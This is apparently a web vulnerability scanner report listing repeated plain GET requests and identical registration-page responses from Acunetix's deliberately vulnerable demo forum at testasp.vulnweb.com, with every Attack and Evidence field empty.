| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=40 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D40" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=6 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D6" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=7 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D7" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
